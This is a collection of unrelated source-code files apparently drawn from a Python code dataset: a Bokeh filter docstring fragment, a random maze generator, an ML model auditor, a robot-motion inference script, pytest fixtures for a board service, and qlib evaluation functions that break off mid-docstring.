    A snippet of JavaScript code to filter data contained in a columnar data source.
    The code is made into the body of a function, and all of of the named objects in
    ``args`` are available as parameters that the code can use. The variable
    ``source`` will contain the data source that is associated with the CDSView this
    filter is added to.
    The code should either return the indices of the subset or an array of booleans
    to use to subset data source rows.
    Example:
        .. code-block:: javascript
            code = '''
            var indices = [];
            for (var i = 0; i <= source.data['some_column'].length; i++){
                if (source.data['some_column'][i] == 'some_value') {
                    indices.push(i)
                }
            }
            return indices;
            '''
    .. note:: Use ``CustomJS.from_coffeescript()`` for CoffeeScript source code.
    """)
    use_strict = Bool(default=False, help="""
    Enables or disables automatic insertion of ``"use strict";`` into ``code``.
    """)
| nilq/baby-python | python |
import random
import sys
def room(map, times, max, min):
    """Randomly place `times` square rooms on `map`, painting their cells 4.

    Corners are snapped to odd coordinates and side lengths are forced odd so
    rooms line up with the maze's road lattice.  Rooms may overlap; cells on
    or outside the border are simply not painted.  Returns the rooms as a
    list of ((row, col), side_length) tuples.
    """
    rows = len(map)
    cols = len(map[0])
    placed = []
    for _ in range(times):
        corner = (random.randint(0, int((rows-1)/2))*2+1,
                  random.randint(0, int((cols-1)/2))*2+1)
        side = random.randint(int(min/2), int(max/2))*2+1
        placed.append((corner, side))
    # paint every room's cells, skipping anything on the outer border
    for (r0, c0), side in placed:
        for r in range(r0, r0+side):
            for c in range(c0, c0+side):
                if 0 < r < rows-1 and 0 < c < cols-1:
                    map[r][c] = 4
    return placed
def open_door(map, rooms, door_ratio):
    """Punch doors through each room's surrounding walls.

    For every room, each of the four walls is scanned for cells whose outward
    neighbour is a visited road (value 2); such a cell becomes a door (set to
    2) with probability `door_ratio`.  The first candidate found is always
    opened, so no room ends up sealed.

    param:
        map: 2-D grid indexed map[row][col]; 2 marks roads/doors
        rooms: list of ((row, col), side_length) tuples from room()
        door_ratio: probability of opening each additional candidate door
    """
    # map
    width = len(map)
    height = len(map[0])
    for room in rooms:
        # check each walls
        isHasOneDoor = False
        # top wall: the row just above the room, scanning the room's columns
        for y in range(room[0][1], room[0][1]+room[1]):
            x = room[0][0]-1
            if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x-1 >= 0 and map[x-1][y] == 2:
                if random.random() > (1-door_ratio) or not isHasOneDoor:
                    map[x][y] = 2
                    isHasOneDoor = True
        # bottom wall: the row just below the room
        # (was room[0][0]+room[1]+1, one row past the actual wall)
        for y in range(room[0][1], room[0][1]+room[1]):
            x = room[0][0]+room[1]
            if 0 <= y and y <= height-1 and 0 <= x and x <= width-1 and x+1 <= width-1 and map[x+1][y] == 2:
                if random.random() > (1-door_ratio) or not isHasOneDoor:
                    map[x][y] = 2
                    isHasOneDoor = True
        # left wall: the column just left of the room, scanning the room's rows
        # (was room[0][0]-1, i.e. the ROW coordinate used as a column)
        for x in range(room[0][0], room[0][0]+room[1]):
            y = room[0][1]-1
            if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y-1 >= 0 and map[x][y-1] == 2:
                if random.random() > (1-door_ratio) or not isHasOneDoor:
                    map[x][y] = 2
                    isHasOneDoor = True
        # right wall: the column just right of the room
        # (was room[0][0]+room[1]+1 — row coordinate, and one column too far —
        # and the bound check compared y+1 against width instead of height)
        for x in range(room[0][0], room[0][0]+room[1]):
            y = room[0][1]+room[1]
            if 0 <= x and x <= width-1 and 0 <= y and y <= height-1 and y+1 <= height-1 and map[x][y+1] == 2:
                if random.random() > (1-door_ratio) or not isHasOneDoor:
                    map[x][y] = 2
                    isHasOneDoor = True
def maze(height, width, rooms_count, room_max_length, room_min_length, door_ratio):
    """Generate and print a maze with randomly placed rooms.

    Builds a grid whose roads live at odd coordinates, carves a maze with a
    randomized Prim-style expansion from a random start cell, stamps rooms on
    top, opens doors in the room walls, and prints the result (' ' for
    walkable cells, a block character for walls).

    NOTE(review): the first parameter is called `height` but sizes the inner
    dimension of the grid while `width` sizes the outer one (map[row][col]
    with `width` rows) — confirm the intended orientation.
    """
    # 0 unvisited road
    # 1 unvisited wall
    # 2 visited road
    # 3 visited wall
    # 4 room district
    # Generate maze map
    map = [[1 for i in range(height)] for i in range(width)]
    # seed unvisited roads at odd (row, col) positions
    for i in range(1, width):
        for j in range(1, height-1):
            if j % 2 != 0 and i % 2 != 0:
                map[i][j] = 0
    # shuffle some rooms
    rooms = room(map, rooms_count, room_max_length, room_min_length)
    # shuffle a start point (re-roll until it lands on an unvisited road)
    sp = (random.randint(0, width-1), random.randint(0, height-1))
    while map[sp[0]][sp[1]] != 0:
        sp = (random.randint(0, width-1), random.randint(0, height-1))
    # frontier entries are (row, col, originating_road_cell)
    point_list = []
    # Start
    map[sp[0]][sp[1]] = 2
    point_list.append((sp[0]-1, sp[1], sp))
    point_list.append((sp[0], sp[1]-1, sp))
    point_list.append((sp[0]+1, sp[1], sp))
    point_list.append((sp[0], sp[1]+1, sp))
    # Loop for generation
    while len(point_list) > 0:
        # shuffle a point in list
        point = point_list[random.randint(0, len(point_list)-1)]
        # check shuffle availability
        if not (0 <= point[0] and point[0] <= width-1 and 0 <= point[1] and point[1] <= height-1):
            point_list.remove(point)
            continue
        # expand: check_point mirrors the originating road across the wall
        road = point[2]
        check_point = (point[0]-road[0]+point[0],
                       point[1]-road[1]+point[1])
        if (0 <= check_point[0] and check_point[0] <= width-1 and 0 <= check_point[1] and check_point[1] <= height-1) and map[check_point[0]][check_point[1]] == 0:
            # carve both the wall cell and the road cell beyond it
            map[check_point[0]][check_point[1]] = 2
            map[point[0]][point[1]] = 2
            # add around points of check_point
            # NOTE(review): these bound checks look one-sided (e.g.
            # check_point[0] <= width-1 before indexing [check_point[0]+1]);
            # with odd-lattice roads the edge case may be unreachable — confirm.
            if check_point[0] >= 0 and map[check_point[0]-1][check_point[1]] == 1:
                point_list.append(
                    (check_point[0]-1, check_point[1], check_point))
            if check_point[0] <= width-1 and map[check_point[0]+1][check_point[1]] == 1:
                point_list.append(
                    (check_point[0]+1, check_point[1], check_point))
            if check_point[1] >= 0 and map[check_point[0]][check_point[1]-1] == 1:
                point_list.append(
                    (check_point[0], check_point[1]-1, check_point))
            if check_point[1] <= height-1 and map[check_point[0]][check_point[1]+1] == 1:
                point_list.append(
                    (check_point[0], check_point[1]+1, check_point))
        # remove from list
        point_list.remove(point)
    # open door in room walls
    open_door(map, rooms, door_ratio)
    # output: walkable cells (road/visited road/room) print as spaces
    for x in map:
        for y in x:
            if y == 0 or y == 2 or y == 4:
                print(' ', end='')
            else:
                print('▉', end='')
        print()
    print()
# CLI entry: height width rooms_count room_max_length room_min_length door_ratio
# NOTE(review): door_ratio is parsed with int(), so only 0 or 1 are expressible
# from the command line even though open_door treats it as a probability.
args = sys.argv[1:]
maze(int(args[0]), int(args[1]), int(args[2]),
     int(args[3]), int(args[4]), int(args[5]))
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""Main module."""
import warnings
from collections import Counter
from math import sqrt
import mlprimitives
import numpy as np
from mlblocks import MLPipeline
from scipy.stats import entropy
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.neighbors import NearestNeighbors
import pandas as pd
from cardea.modeling.modeler import Modeler
class ModelAuditor():
    """Audits ML pipelines: runs k-fold evaluation, reports prediction
    metrics, and optionally summarizes pipeline intermediates and
    nearest-neighbor statistics of sampled test instances."""
    __name__ = 'ModelAuditor'
    def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):
        '''Runs Kfold cross-validation where it predicts all the primitives within the pipeline.
        Args:
            features_train: the training features.
            feature_test: the testing features.
            target: the training targets.
            primitive: the machine learning primitive (or list of primitives) to run.
            hyperparameters: the hyperparameters of the given primitives.
        Returns:
            The fit/predict result for the pipeline, or None if the pipeline's
            last block does not produce an X/y array-like output.
        '''
        # assert that the features and targets have the same size
        modeler = Modeler()
        #pipeline = self.create_pipeline(primitive, hyperparameters)
        pipeline = modeler.create_pipeline(primitive, hyperparameters)
        last_block_in_pipeline = list(pipeline.blocks.values())[-1]
        #Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)
        for output in last_block_in_pipeline.produce_output:
            # only run when the pipeline terminates in a tabular/array X or y
            check_name = output['name'] == 'X' or output['name'] == 'y'
            check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'
            check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'
            if check_name and (check_numpy or check_pandas):
                # Modeler expects pandas containers
                features_train = pd.DataFrame(features_train)
                feature_test = pd.DataFrame(feature_test)
                target = pd.Series(target)
                return modeler.fit_predict_model(features_train, target, feature_test, pipeline)
        return None
    def generate_kfolds(self, features, target, n_folds=10):
        '''Creates Kfold cross-validation for the given features and targets
        Args:
            features: The features as a numpy array to create the k-folds for
            target: the targets as a numpy array
            n_folds: the number of folds to create
        Returns:
            a tuple that consist of two values, the folds features and the folds targets
            (each fold is a [train, test] pair)
        '''
        kf = KFold(n_splits=n_folds, shuffle=True)
        folds_features = []
        folds_targets = []
        for train_index, test_index in kf.split(features):
            X_train = features[train_index]
            X_test = features[test_index]
            y_train = target[train_index]
            y_test = target[test_index]
            folds_features.append([X_train, X_test])
            folds_targets.append([y_train, y_test])
        return folds_features, folds_targets
    def execute_pipeline(self, pipeline_primitives, features_train, target,
                         features_test, problem_type, hyperparameters = None,
                         with_intermediate = False):
        '''Executes a pipeline and generates all the intermediates of the pipeline.
        Args:
            pipeline_primitives: Array of the pipeline primitives.
            features_train: the training features data to run through the pipeline.
            features_test: the testing features data to run through the pipeline.
            target: The target of the training data to run through the pipeline.
            problem_type: the type of the problem (classification or regression).
            hyperparameters: the hyperparameters to run for the model
            with_intermediate: A boolean to add or ignore the intermediates metrics.
        Returns:
            A list of results, one per (partial) pipeline: when
            with_intermediate is set, every prefix of the pipeline is run so
            the in-between data can be inspected; otherwise only the full
            pipeline runs.
        '''
        pipeline_intermediates = []
        if with_intermediate:
            # every prefix pipeline_primitives[:1], [:2], ..., [:N]
            all_partial_primitives = [pipeline_primitives[:index] for index in range(1,len(pipeline_primitives) + 1)]
        else:
            all_partial_primitives = [pipeline_primitives]
        for partial_primitives in all_partial_primitives:
            pipeline_results = self.run_fold(features_train, target,
                                             features_test, partial_primitives,
                                             hyperparameters)
            #if pipeline_results != None:
            pipeline_intermediates.append(pipeline_results)
        return pipeline_intermediates
    def report_regression_result(self, actual, predicted):
        '''Reports the prediction results for a regression model.
        Args:
            actual: A 1d list of the target variable for the actual test data.
            predicted: A 1d list of the prediction result.
        Returns:
            A dict of various evaluation metrics for regression; metrics that
            cannot be computed for the data are skipped with a warning.
        '''
        metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],
                                ['mean_absolute_error', metrics.mean_absolute_error],
                                ['mean_squared_error', metrics.mean_squared_error],
                                ['mean_squared_log_error', metrics.mean_squared_log_error],
                                ['median_absolute_error', metrics.median_absolute_error],
                                ['r2_score', metrics.r2_score]]
        results_dict = {}
        for metric in metrics_to_calculate:
            try:
                results_dict[metric[0]] = metric[1](actual, predicted)
            except BaseException:
                warnings.warn(
                    '{} can\'t be calculated for this data'.format(metric[0]),
                    UserWarning)
        return results_dict
    def report_classification_result(self, actual, predicted):
        '''Reports the prediction results for a classification model.
        Args:
            actual: A 1d list of the target variable for the actual test data.
            predicted: A 1d list of the prediction result.
        Returns:
            A dict with accuracy, macro-averaged f1/precision/recall, and the
            normalized per-class prediction counts; metrics that cannot be
            computed for the data are skipped with a warning.
        '''
        metrics_to_calculate = [['accuracy', metrics.accuracy_score],
                                ['f1', metrics.f1_score],
                                ['precision', metrics.precision_score],
                                ['recall', metrics.recall_score],
                                ['class_count', Counter]]
        results_dict = {}
        for metric in metrics_to_calculate:
            try:
                if metric[0] == 'accuracy':
                    results_dict[metric[0]] = metric[1](actual, predicted)
                elif metric[0] == 'class_count':
                    # fraction of predictions per class label
                    counter_dict = metric[1](predicted)
                    label_count_sum = sum(counter_dict.values())
                    for label in counter_dict.keys():
                        results_dict['{}_{}'.format(metric[0], str(
                            label))] = counter_dict[label] / label_count_sum
                else:
                    results_dict['{}_macro'.format(metric[0])] = metric[1](
                        actual, predicted, average='macro')
            except BaseException:
                warnings.warn(
                    '{} can\'t be calculated for this data'.format(metric[0]),
                    UserWarning)
        return results_dict
    def euclidean_distance(self, x, y):
        '''Computes the euclidean distance between two vectors.
        Args:
            x: The first vector.
            y: The second vector.
        Returns:
            The euclidean distance.
        '''
        return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))
    def intermediate_metrics(self, intermediate):
        '''Generates metrics of the intermediates (features data in-between primitives).
        Args:
            intermediate: The intermediate data that must be investigated (for a single fold).
        Returns:
            A per-column summary dict (percentiles, variance, std, entropy).
        '''
        if type(intermediate) != pd.DataFrame:
            intermediate = pd.DataFrame(intermediate)
        summary = {}
        for column_name in list(intermediate.columns):
            intermediate_column = intermediate[column_name]
            col_metrics = {}
            col_metrics['index'] = column_name
            col_metrics['perc_25'] = np.percentile(intermediate_column, 25)
            col_metrics['perc_50'] = np.percentile(intermediate_column, 50)
            col_metrics['perc_75'] = np.percentile(intermediate_column, 75)
            col_metrics['variance'] = np.var(intermediate_column)
            col_metrics['std'] = np.std(intermediate_column)
            # NOTE(review): scipy.stats.entropy expects non-negative values;
            # columns with negatives will yield nan/inf — confirm inputs.
            col_metrics['entropy'] = entropy(intermediate_column)
            summary[column_name] = col_metrics
        return summary
    def find_k_nearest_neighbors(self, data, instance, k=5):
        '''Finds the k-nearest neighbors from the data to an instance.
        Args:
            data: The data that will be searched to find the nearest neighbors.
            instance: the instance that needs to identify its nearest neighbors.
            k: the number of nearest neighbors to consider.
        Returns:
            Array of the k nearest neighbors to the instance.
            NOTE(review): `indices` has shape (1, k), so data[indices] is
            3-dimensional — confirm downstream consumers expect that.
        '''
        nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)
        distances, indices = nbrs.kneighbors([instance])
        return data[indices]
    def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):
        '''Summarizes the nearest neighbors of a sample in the data.
        Args:
            folds_features: The folds containing the training and testing of the features data.
            folds_targets: The folds containing the training and testing of the target data.
            k: the number of nearest neighbors to consider
        Returns:
            Summary of all the features for the nearest neighbors, per fold,
            for k randomly chosen test instances.
        '''
        nearest_neighbors_summary = []
        for x, y in zip(folds_features, folds_targets):
            X_train = x[0]
            X_test = x[1]
            y_test = y[1]
            # sample k test instances without replacement
            indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)
            chosen_instances_features = X_test[indices_to_select]
            chosen_instances_targets = y_test[indices_to_select]
            fold_nearest_neighbors_summary = []
            for instance_features, instance_target in zip(
                    chosen_instances_features, chosen_instances_targets):
                nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)
                neighbors_summary = self.intermediate_metrics(nearest_neighbors)
                fold_nearest_neighbors_summary.append({'instance_features': instance_features,
                                                       'instance_target': instance_target,
                                                       'neighbors_summary': neighbors_summary})
            nearest_neighbors_summary.append(fold_nearest_neighbors_summary)
        return nearest_neighbors_summary
    def generate_pipeline_report(self, pipeline_primitives, features,
                                 target, problem_type, hyperparameters = None,
                                 with_intermediates_metrics = False,
                                 with_nearest_neighbors = False):
        '''Generates the full report of the model auditor in a json format.
        Args:
            pipeline_primitives: Array of the pipeline primitives to run.
            features: The features data to run through the pipeline.
            target: The target data to run through the pipeline.
            problem_type: The type of the problem (classification or regression).
            hyperparameters: Specify parameters that must be specified in the primitives.
            with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
            with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
        Returns:
            A dict of the model auditing results, keyed by report section.
        '''
        report = {}
        # Generate the folds
        columns_names = list(features.columns)
        features = np.array(features)
        target = np.array(target)
        folds_features, folds_targets = self.generate_kfolds(features, target)
        # create the intermediates (one result list per fold)
        intermediates_list = []
        for x, y in zip(folds_features, folds_targets):
            X_train = pd.DataFrame(x[0],columns = columns_names)
            X_test = pd.DataFrame(x[1],columns = columns_names)
            y_train = y[0]
            fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,
                                                            y_train, X_test, problem_type,
                                                            with_intermediate = with_intermediates_metrics,
                                                            hyperparameters = hyperparameters)
            intermediates_list.append(fold_intermediates_list)
        # print(intermediates_list)
        # score each fold's final predictions against its held-out targets
        output_result = []
        if problem_type == 'classification':
            for actual, predicted in zip(folds_targets, intermediates_list):
                fold_result = self.report_classification_result(actual[1], predicted[-1])
                output_result.append(fold_result)
        elif problem_type == 'regression':
            for actual, predicted in zip(folds_targets, intermediates_list):
                fold_result = self.report_regression_result(actual[1], predicted[-1])
                output_result.append(fold_result)
        report['output_result'] = output_result
        if with_intermediates_metrics:
            intermediates_metrics = {}
            for fold in intermediates_list:
                # all but the last entry are intermediate (prefix-pipeline) outputs
                for idx,intermediate in enumerate(fold[:-1]):
                    intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]
                    try:
                        intermediate_result = self.intermediate_metrics(intermediate)
                        intermediates_metrics[intermediate_key] = intermediate_result
                    except BaseException as e:
                        print(e.args)
                        warnings.warn(
                            'intermediate metrics can\'t be calculated for {}'.format(intermediate_key),
                            UserWarning)
            report['intermediates_result'] = intermediates_metrics
        if with_nearest_neighbors:
            nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)
            report['nearest_neighbors'] = nearest_neighbors
        return report
    def generate_pipeline_report_with_test(self, pipeline_primitives, features,
                                           target, test, actual, problem_type, hyperparameters = None,
                                           with_intermediates_metrics = False,
                                           with_nearest_neighbors = False):
        '''Generates the full report of the model auditor in a json format,
        using an explicit train/test split instead of k-fold cross-validation.
        Args:
            pipeline_primitives: Array of the pipeline primitives to run.
            features: The training features data to run through the pipeline.
            target: The training target data.
            test: The test features data.
            actual: The test target data.
            problem_type: The type of the problem (classification or regression).
            hyperparameters: Specify parameters that must be specified in the primitives.
            with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
            with_intermediates_metrics: A boolean accepted for signature parity
                (intermediates are not computed in this variant).
        Returns:
            A dict of the model auditing results.
        '''
        report = {}
        # Generate the folds
        columns_names = list(features.columns)
        X_train = np.array(features)
        y_train = np.array(target)
        X_test = np.array(test)
        y_test = np.array(actual)
        # print("X_train ", X_train.shape)
        # print("y_train ", y_train.shape)
        # print("X_test ", X_test.shape)
        # print("y_test ", y_test.shape)
        y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,
                                       with_intermediate=False,
                                       hyperparameters=hyperparameters)
        output_result = []
        if problem_type == 'classification':
            fold_result = self.report_classification_result(y_test, y_pred[-1])
            output_result.append(fold_result)
        elif problem_type == 'regression':
            fold_result = self.report_regression_result(y_test, y_pred[-1])
            output_result.append(fold_result)
        report['output_result'] = output_result
        if with_nearest_neighbors:
            # NOTE(review): summarize_nearest_neighbors expects per-fold
            # [train, test] pairs, but plain arrays are passed here — this
            # branch likely fails at runtime; confirm intended usage.
            nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)
            report['nearest_neighbors'] = nearest_neighbors
        return report
| nilq/baby-python | python |
import torch
import torch.nn as nn
import torch.optim as optim
import torch_geometric.transforms as transforms
from torch_geometric.data import Data, Batch
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import numpy as np
import h5py
import argparse
import logging
import time
import os
import copy
from datetime import datetime
import dataset
from dataset import Normalize, parse_h5
from models import model
from models.loss import CollisionLoss, JointLimitLoss, RegLoss
from train import train_epoch
from utils.config import cfg
from utils.util import create_folder
# Argument parse
parser = argparse.ArgumentParser(description='Inference with trained model')
parser.add_argument('--cfg', default='configs/inference/yumi.yaml', type=str, help='Path to configuration file')
args = parser.parse_args()
# Configurations parse
# cfg is a global yacs-style config object; merge_from_file overlays the YAML
# file on top of the defaults and freeze() makes it read-only afterwards.
cfg.merge_from_file(args.cfg)
cfg.freeze()
print(cfg)
# Create folder
# Output directories for checkpoints, text logs and tensorboard summaries.
create_folder(cfg.OTHERS.SAVE)
create_folder(cfg.OTHERS.LOG)
create_folder(cfg.OTHERS.SUMMARY)
# Create logger & tensorboard writer
# Timestamped log file plus a handler mirroring everything to the console.
logging.basicConfig(level=logging.INFO, format="%(message)s", handlers=[logging.FileHandler(os.path.join(cfg.OTHERS.LOG, "{:%Y-%m-%d_%H-%M-%S}.log".format(datetime.now()))), logging.StreamHandler()])
logger = logging.getLogger()
writer = SummaryWriter(os.path.join(cfg.OTHERS.SUMMARY, "{:%Y-%m-%d_%H-%M-%S}".format(datetime.now())))
# Device setting
# Prefer GPU when available; all tensors/models below are moved to this device.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if __name__ == '__main__':
    # Load data
    pre_transform = transforms.Compose([Normalize()])
    # parse_h5 yields one graph per motion frame plus the raw glove angles of both hands.
    test_data, l_hand_angle, r_hand_angle= parse_h5(filename=cfg.INFERENCE.MOTION.SOURCE, selected_key=cfg.INFERENCE.MOTION.KEY)
    test_data = [pre_transform(data) for data in test_data]
    # Manual batching: slice the frame list into chunks of BATCH_SIZE.
    indices = [idx for idx in range(0, len(test_data), cfg.HYPER.BATCH_SIZE)]
    test_loader = [test_data[idx: idx+cfg.HYPER.BATCH_SIZE] for idx in indices]
    test_target = sorted([target for target in getattr(dataset, cfg.DATASET.TEST.TARGET_NAME)(root=cfg.DATASET.TEST.TARGET_PATH)], key=lambda target : target.skeleton_type)
    # Dump the (normalized) source joint positions for later comparison.
    hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'source.h5'), 'w')
    g1 = hf.create_group('group1')
    source_pos = torch.stack([data.pos for data in test_data], dim=0)
    # assumes the first 3 rows per frame are left-hand joints, the rest right — TODO confirm
    g1.create_dataset('l_joint_pos_2', data=source_pos[:, :3])
    g1.create_dataset('r_joint_pos_2', data=source_pos[:, 3:])
    hf.close()
    print('Source H5 file saved!')
    # Create model
    model = getattr(model, cfg.MODEL.NAME)().to(device)
    # Load checkpoint
    if cfg.MODEL.CHECKPOINT is not None:
        model.load_state_dict(torch.load(cfg.MODEL.CHECKPOINT))
    # store initial z
    # One latent code per batch, initialized by the encoder and optimized directly below
    # (the model weights themselves stay fixed).
    model.eval()
    z_all = []
    for batch_idx, data_list in enumerate(test_loader):
        for target_idx, target in enumerate(test_target):
            # fetch target
            target_list = [target for data in data_list]
            # forward
            z = model.encode(Batch.from_data_list(data_list).to(device)).detach()
            # z = torch.empty(Batch.from_data_list(target_list).x.size(0), 64).normal_(mean=0, std=0.005).to(device)
            z.requires_grad = True
            z_all.append(z)
    # Create loss criterion
    # end effector loss
    ee_criterion = nn.MSELoss() if cfg.LOSS.EE else None
    # vector similarity loss
    vec_criterion = nn.MSELoss() if cfg.LOSS.VEC else None
    # collision loss
    col_criterion = CollisionLoss(cfg.LOSS.COL_THRESHOLD) if cfg.LOSS.COL else None
    # joint limit loss
    lim_criterion = JointLimitLoss() if cfg.LOSS.LIM else None
    # end effector orientation loss
    ori_criterion = nn.MSELoss() if cfg.LOSS.ORI else None
    # regularization loss
    reg_criterion = RegLoss() if cfg.LOSS.REG else None
    # Create optimizer
    # Adam optimizes the latent codes themselves.
    optimizer = optim.Adam(z_all, lr=cfg.HYPER.LEARNING_RATE)
    best_loss = float('Inf')
    best_z_all = copy.deepcopy(z_all)
    best_cnt = 0
    start_time = time.time()
    # latent optimization
    for epoch in range(cfg.HYPER.EPOCHS):
        train_loss = train_epoch(model,
                                 ee_criterion, vec_criterion, col_criterion, lim_criterion, ori_criterion, reg_criterion,
                                 optimizer,
                                 test_loader, test_target,
                                 epoch, logger, cfg.OTHERS.LOG_INTERVAL, writer, device, z_all)
        # Save model
        # Early stopping: keep the best latents; stop after 5 epochs without improvement.
        if train_loss > best_loss:
            best_cnt += 1
        else:
            best_cnt = 0
            best_loss = train_loss
            best_z_all = copy.deepcopy(z_all)
        if best_cnt == 5:
            logger.info("Interation Finished")
            break
        print(best_cnt)
    # store final results
    model.eval()
    pos_all = []
    ang_all = []
    for batch_idx, data_list in enumerate(test_loader):
        for target_idx, target in enumerate(test_target):
            # fetch target
            target_list = [target for data in data_list]
            # fetch z
            z = best_z_all[batch_idx]
            # forward
            target_ang, target_pos, _, _, _, _, target_global_pos = model.decode(z, Batch.from_data_list(target_list).to(z.device))
            pos_all.append(target_global_pos)
            ang_all.append(target_ang)
    if cfg.INFERENCE.H5.BOOL:
        pos = torch.cat(pos_all, dim=0).view(len(test_data), -1, 3).detach().cpu().numpy() # [T, joint_num, xyz]
        ang = torch.cat(ang_all, dim=0).view(len(test_data), -1).detach().cpu().numpy()
        hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'inference.h5'), 'w')
        g1 = hf.create_group('group1')
        # presumably 7 joints per YuMi arm, left block first — TODO confirm output layout
        g1.create_dataset('l_joint_pos_2', data=pos[:, :7])
        g1.create_dataset('r_joint_pos_2', data=pos[:, 7:])
        g1.create_dataset('l_joint_angle_2', data=ang[:, :7])
        g1.create_dataset('r_joint_angle_2', data=ang[:, 7:])
        g1.create_dataset('l_glove_angle_2', data=l_hand_angle)
        g1.create_dataset('r_glove_angle_2', data=r_hand_angle)
        hf.close()
        print('Target H5 file saved!')
| nilq/baby-python | python |
"""
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
import pytest
from byceps.services.board.dbmodels.posting import Posting as DbPosting
from byceps.services.board.dbmodels.topic import Topic as DbTopic
from byceps.services.board.transfer.models import Board, Category
from byceps.services.user.transfer.models import User
from tests.helpers import log_in_user
from .helpers import create_category, create_posting, create_topic
@pytest.fixture(scope='package')
def category(board: Board) -> Category:
    """First board category, shared across the test package."""
    return create_category(board.id, number=1)
@pytest.fixture(scope='package')
def another_category(board: Board) -> Category:
    """Second board category, e.g. as a move target for topics."""
    return create_category(board.id, number=2)
@pytest.fixture
def topic(category: Category, board_poster: User) -> DbTopic:
    """Fresh topic per test, created by the board poster."""
    return create_topic(category.id, board_poster.id)
@pytest.fixture
def posting(topic: DbTopic, board_poster: User) -> DbPosting:
    """Fresh posting per test, attached to the per-test topic."""
    return create_posting(topic.id, board_poster.id)
@pytest.fixture(scope='package')
def board_poster(make_user) -> User:
    """Regular user that authors topics and postings."""
    return make_user()
@pytest.fixture(scope='package')
def moderator(make_admin) -> User:
    """Admin user holding the board moderation permissions, already logged in."""
    permission_ids = {
        'board.hide',
        'board_topic.lock',
        'board_topic.move',
        'board_topic.pin',
    }
    moderator = make_admin(permission_ids)
    log_in_user(moderator.id)
    return moderator
@pytest.fixture(scope='package')
def moderator_client(make_client, site_app, moderator: User):
    """HTTP test client authenticated as the moderator."""
    return make_client(site_app, user_id=moderator.id)
| nilq/baby-python | python |
"""
Here is a batch of evaluation functions.
The interface should be redesigned carefully in the future.
"""
import pandas as pd
from typing import Tuple
from qlib import get_module_logger
from qlib.utils.paral import complex_parallel, DelayedDict
from joblib import Parallel, delayed
def calc_long_short_prec(
pred: pd.Series, label: pd.Series, date_col="datetime", quantile: float = 0.2, dropna=False, is_alpha=False
) -> Tuple[pd.Series, pd.Series]:
"""
calculate the precision for long and short operation
:param pred/label: index is **pd.MultiIndex**, index name is **[datetime, instruments]**; columns names is **[score]**.
.. code-block:: python
score
datetime instrument
2020-12-01 09:30:00 SH600068 0.553634
SH600195 0.550017
SH600276 0.540321
SH600584 0.517297
SH600715 0.544674
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
long precision and short precision in time level
"""
if is_alpha:
label = label - label.mean(level=date_col)
if int(1 / quantile) >= len(label.index.get_level_values(1).unique()):
raise ValueError("Need more instruments to calculate precision")
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
# find the top/low quantile of prediction and treat them as long and short target
long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label).reset_index(level=0, drop=True)
short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label).reset_index(level=0, drop=True)
groupll = long.groupby(date_col)
l_dom = groupll.apply(lambda x: x > 0)
l_c = groupll.count()
groups = short.groupby(date_col)
s_dom = groups.apply(lambda x: x < 0)
s_c = groups.count()
return (l_dom.groupby(date_col).sum() / l_c), (s_dom.groupby(date_col).sum() / s_c)
def calc_long_short_return(
    pred: pd.Series,
    label: pd.Series,
    date_col: str = "datetime",
    quantile: float = 0.2,
    dropna: bool = False,
) -> Tuple[pd.Series, pd.Series]:
    """
    calculate long-short return

    Note:
        `label` must be raw stock returns.

    Parameters
    ----------
    pred : pd.Series
        stock predictions
    label : pd.Series
        stock returns
    date_col : str
        datetime index name
    quantile : float
        long-short quantile

    Returns
    ----------
    long_short_r : pd.Series
        daily long-short returns
    long_avg_r : pd.Series
        daily long-average returns
    """
    merged = pd.DataFrame({"pred": pred, "label": label})
    if dropna:
        merged.dropna(inplace=True)
    daily = merged.groupby(level=date_col)

    def bucket_size(frame):
        # number of names in the long/short leg for this date
        return int(len(frame) * quantile)

    long_ret = daily.apply(lambda frame: frame.nlargest(bucket_size(frame), columns="pred").label.mean())
    short_ret = daily.apply(lambda frame: frame.nsmallest(bucket_size(frame), columns="pred").label.mean())
    avg_ret = daily.label.mean()
    return (long_ret - short_ret) / 2, avg_ret
def pred_autocorr(pred: pd.Series, lag=1, inst_col="instrument", date_col="datetime"):
    """pred_autocorr.

    Cross-sectional autocorrelation of predictions: for every date, the correlation
    between that date's prediction vector and the vector `lag` (dense) dates earlier.

    Limitation:
    - If the datetime is not sequential densely, the correlation will be calculated based on adjacent dates. (some users may expect NaN)

    :param pred: pd.Series with following format
                instrument  datetime
                SH600000    2016-01-04   -0.000403
                            2016-01-05   -0.000753
                            2016-01-06   -0.021801
                            2016-01-07   -0.065230
